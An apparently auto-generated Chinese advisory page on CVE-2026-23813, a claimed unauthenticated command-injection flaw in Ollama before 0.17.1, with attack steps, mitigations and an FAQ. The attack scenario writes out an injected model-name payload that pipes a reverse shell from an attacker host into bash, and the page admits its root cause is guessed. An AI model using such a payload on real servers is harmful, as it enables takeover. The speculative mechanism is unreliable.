Exploit for CVE-2026-23813 exploit
CVE-2026-23813 影响 Ollama 0.17.1 之前版本,是一个高危远程代码执行漏洞(CVSS 9.8)。攻击者无需认证,通过构造恶意请求即可在服务器上执行任意命令。本文提供详细技术分析、攻击场景、修复建议及检测方法,帮助团队快速防御和修复。
Exploit for CVE-2026-23813 exploit
📋 漏洞概述
CVE-2026-23813 影响 Ollama < 0.17.1,存在远程代码执行漏洞,攻击者可利用特制请求在服务器上执行任意命令。
📋 基础信息
| 受影响版本 | Ollama < 0.17.1 |
| 漏洞类型 | 输入验证不当 |
| CVSS | 9.8 · Critical |
| CVE | CVE-2026-23813 |
🔬 漏洞根因
Ollama 在处理模型文件加载请求时,对用户提供的模型名称或路径参数缺乏充分的输入验证和过滤。攻击者可以通过构造包含命令注入 payload 的恶意请求,使得后端在调用系统命令加载模型时执行未预期的 shell 命令。推测漏洞位于 API 端点中处理模型标识符的解析逻辑,未对特殊字符(如管道符、分号、反引号)进行转义或白名单校验。
🎯 攻击场景
1. 攻击者收集目标 Ollama 服务版本信息(如通过 /api/tags 探活)。 2. 构造恶意 HTTP 请求向 /api/pull 或 /api/create 等接口发送,其中模型名称参数嵌入命令注入 payload(例如:`; curl http://attacker.com/revshell | bash`)。 3. Ollama 后端在拼接系统命令时未正确转义,导致 payload 被 shell 解释执行。 4. 攻击者监听反向 shell 或接收外带数据,获取服务器控制权。 5. 成功标志:攻击者获得目标服务器的交互式 shell 或执行了任意系统命令。
💥 漏洞影响
远程代码执行(RCE),攻击者无需认证即可在受影响版本的 Ollama 服务器上以服务进程权限执行任意系统命令,可能导致服务器完全失陷、数据泄露、服务中断或被用作跳板攻击内部网络。影响范围包括所有暴露在公网或未进行访问控制的 Ollama 服务。
🛡️ 修复建议
升级至 Ollama >= 0.17.1 版本以修复输入验证缺陷。临时缓解措施:限制 Ollama 服务的网络暴露范围(如仅在 localhost 监听),或使用反向代理/WAF 对请求中的模型名称参数进行严格的字符白名单过滤,禁止包含 shell 元字符(;|&`$(){}[]<>)。
📎 参考链接
- https://nvd.nist.gov/vuln/detail/CVE-2026-23813
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-23813
- 原始来源(Sploitus)
🚨 威胁评估
| 📈 EPSS 利用概率 | 低 (0.1%) (高于 18.2% 的漏洞) |
| 🚨 CISA KEV | 未被已知利用 |
| 🔧 公开 PoC | 1 个公开 PoC 仓库 |
⚠️ 本文由漏洞情报系统自动生成,仅供安全研究与防御参考。生成时间: 2026-05-25 08:06 | 来源: Sploitus
🤖 常见问题解答(FAQ)
❓ 如何检测是否受影响?
通过 curl 请求 GET /api/version 或 GET /api/tags 获取版本号,若 < 0.17.1 则受影响;也可测试命令注入 payload 观察回显延迟或异常行为。
❓ 攻击需要哪些前置条件?
攻击者需要网络可达(Ollama 服务默认监听 0.0.0.0:11434),且服务版本 < 0.17.1;无需身份认证或特殊权限。
❓ 临时缓解措施有哪些?
修改 Ollama 监听地址为 127.0.0.1(环境变量 OLLAMA_HOST=127.0.0.1);或使用 iptables 限制 11434 端口仅允许信任 IP 访问;或部署 WAF 过滤恶意 payload。